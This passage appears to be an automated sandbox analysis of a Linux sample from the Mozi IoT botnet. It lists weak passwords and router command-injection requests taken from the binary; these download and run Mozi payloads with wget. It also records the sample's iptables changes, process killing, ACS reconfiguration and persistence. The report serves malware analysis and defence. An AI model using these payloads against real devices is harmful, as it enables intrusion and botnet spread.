              Source: Initial sampleString containing potential weak password found: 123456
              Source: Initial sampleString containing potential weak password found: 54321
              Source: Initial sampleString containing potential weak password found: password
              Source: Initial sampleString containing potential weak password found: 12345
              Source: Initial sampleString containing potential weak password found: admin1234
              Source: Initial samplePotential command found: POST /cdn-cgi/
              Source: Initial samplePotential command found: GET /c HTTP/1.0
              Source: Initial samplePotential command found: POST /cdn-cgi/ HTTP/1.1
              Source: Initial samplePotential command found: GET %s HTTP/1.1
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: Initial samplePotential command found: rm /home/httpd/web_shell_cmd.gch
              Source: Initial samplePotential command found: echo 3 > /usr/local/ct/ctadmincfg
              Source: Initial samplePotential command found: mount -o remount,rw /overlay /
              Source: Initial samplePotential command found: mv -f %s %s
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: GET /c
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
              Source: Initial samplePotential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
              Source: Initial samplePotential command found: killall -9 %s
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
              Source: Initial samplePotential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
              Source: Initial samplePotential command found: killall -9 telnetd utelnetd scfgmgr
              Source: Initial samplePotential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
              Source: Initial samplePotential command found: GET /Mozi.6 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.7 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.c HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.m HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.x HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.a HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.s HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.r HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.b HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.4 HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.k HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.l HTTP/1.0
              Source: Initial samplePotential command found: GET /Mozi.p HTTP/1.0
              Source: Initial samplePotential command found: GET /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /%s HTTP/1.1
              Source: Initial samplePotential command found: POST /GponForm/diag_Form?images/ HTTP/1.1
              Source: Initial samplePotential command found: POST /picsdesc.xml HTTP/1.1
              Source: Initial samplePotential command found: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://%s:%d/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: Initial samplePotential command found: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
              Source: Initial samplePotential command found: POST /UD/act?1 HTTP/1.1
              Source: Initial samplePotential command found: POST /HNAP1/ HTTP/1.0
              Source: Initial samplePotential command found: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://%s:%d/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
              Source: Initial samplePotential command found: GET /shell?cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
              Source: Initial samplePotential command found: POST /soap.cgi?service=WANIPConn1 HTTP/1.1
              Source: Initial samplePotential command found: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://%s:%d/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
              Source: Initial samplePotential command found: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://%s:%d/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcron
              Source: ELF static info symbol of initial sample.symtab present: no
              Source: i, type: SAMPLEMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: /usr/networks, type: DROPPEDMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
              Source: classification engineClassification label: mal100.spre.troj.evad.lin@0/221@4/0

              Persistence and Installation Behavior:

              barindex
              Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
              Source: /bin/sh (PID: 4613)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4662)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4675)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4710)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4714)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4732)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4763)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4787)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4860)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4878)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4897)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4909)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4940)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4959)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4994)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 5012)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 5028)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5050)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5062)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5091)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5100)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5124)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5140)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5164)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5183)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5189)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5220)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5240)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5243)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5249)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5282)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5315)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT
              Sample reads /proc/mounts (often used for finding a writable filesystem)Show sources
              Source: /tmp/i (PID: 4562)File: /proc/4562/mountsJump to behavior
              Sample tries to persist itself using /etc/profileShow sources
              Source: /tmp/i (PID: 4562)File: /etc/profile.d/cedilla-portuguese.shJump to behavior
              Source: /tmp/i (PID: 4562)File: /etc/profile.d/apps-bin-path.shJump to behavior
              Source: /tmp/i (PID: 4562)File: /etc/profile.d/Z97-byobu.shJump to behavior
              Source: /tmp/i (PID: 4562)File: /etc/profile.d/bash_completion.shJump to behavior
              Source: /tmp/i (PID: 4562)File: /etc/profile.d/vte-2.91.shJump to behavior
              Sample tries to persist itself using System V runlevelsShow sources
              Source: /tmp/i (PID: 4562)File: /etc/rcS.d/S95baby.shJump to behavior
              Source: /tmp/i (PID: 4562)File: /etc/rc.localJump to behavior
              Terminates several processes with shell command 'killall'Show sources
              Source: /bin/sh (PID: 4566)Killall command executed: killall -9 telnetd utelnetd scfgmgr
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/230/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/231/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/232/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/233/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/234/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3512/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/359/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1452/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3632/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3518/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/10/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1339/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/11/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/12/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/13/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/14/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/15/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/16/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/17/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/18/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/19/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/483/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3527/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3527/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/2/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3525/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1346/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3524/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3524/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/4/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3523/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/5/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/7/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/8/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/9/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/20/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/21/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/22/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/23/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/24/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/25/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/28/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/29/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1363/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3541/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3541/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1362/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/496/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/496/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/30/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/31/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/31/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1119/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3790/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3791/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3310/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3431/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3431/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3550/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/260/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/263/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/264/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/385/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/144/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/386/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/145/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/146/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3546/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3546/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/147/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3303/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3545/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/148/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/149/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3543/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/822/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/822/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3308/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3308/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3429/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3429/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/47/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/48/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/48/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/49/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/150/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/271/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/151/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/152/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/153/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/395/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/396/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/154/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/155/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/156/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/1017/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/157/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/158/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/159/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3432/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/3432/cmdline
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/50/stat
              Source: /usr/bin/killall (PID: 4566)File opened: /proc/51/stat
              Source: /tmp/i (PID: 4564)Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
              Source: /tmp/i (PID: 4605)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4658)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4666)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4708)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4711)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4723)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4752)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4783)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT"
              Source: /tmp/i (PID: 4857)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
              Source: /tmp/i (PID: 4869)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
              Source: /tmp/i (PID: 4892)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
              Source: /tmp/i (PID: 4899)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
              Source: /tmp/i (PID: 4929)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
              Source: /tmp/i (PID: 4935)Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
              Source: /tmp/i (PID: 4937)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
              Source: /tmp/i (PID: 4949)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
              Source: /tmp/i (PID: 4980)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
              Source: /tmp/i (PID: 5009)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
              Source: /tmp/i (PID: 5018)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
              Source: /tmp/i (PID: 5047)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
              Source: /tmp/i (PID: 5052)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
              Source: /tmp/i (PID: 5084)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
              Source: /tmp/i (PID: 5097)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
              Source: /tmp/i (PID: 5118)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
              Source: /tmp/i (PID: 5130)Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
              Source: /tmp/i (PID: 5159)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
              Source: /tmp/i (PID: 5181)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT"
              Source: /tmp/i (PID: 5184)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT"
              Source: /tmp/i (PID: 5213)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT"
              Source: /tmp/i (PID: 5235)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT"
              Source: /tmp/i (PID: 5241)Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 28537 -j ACCEPT"
              Source: /tmp/i (PID: 5244)Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT"
              Source: /tmp/i (PID: 5268)Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT"
              Source: /tmp/i (PID: 5308)Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT"
              Source: /bin/sh (PID: 4613)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4662)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4675)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4710)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4714)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4732)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4763)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4787)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4860)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4878)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4897)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4909)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4940)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4959)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4994)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 5012)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 5028)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5050)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5062)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5091)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5100)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5124)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5140)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5164)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5183)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5189)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5220)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5240)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5243)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT
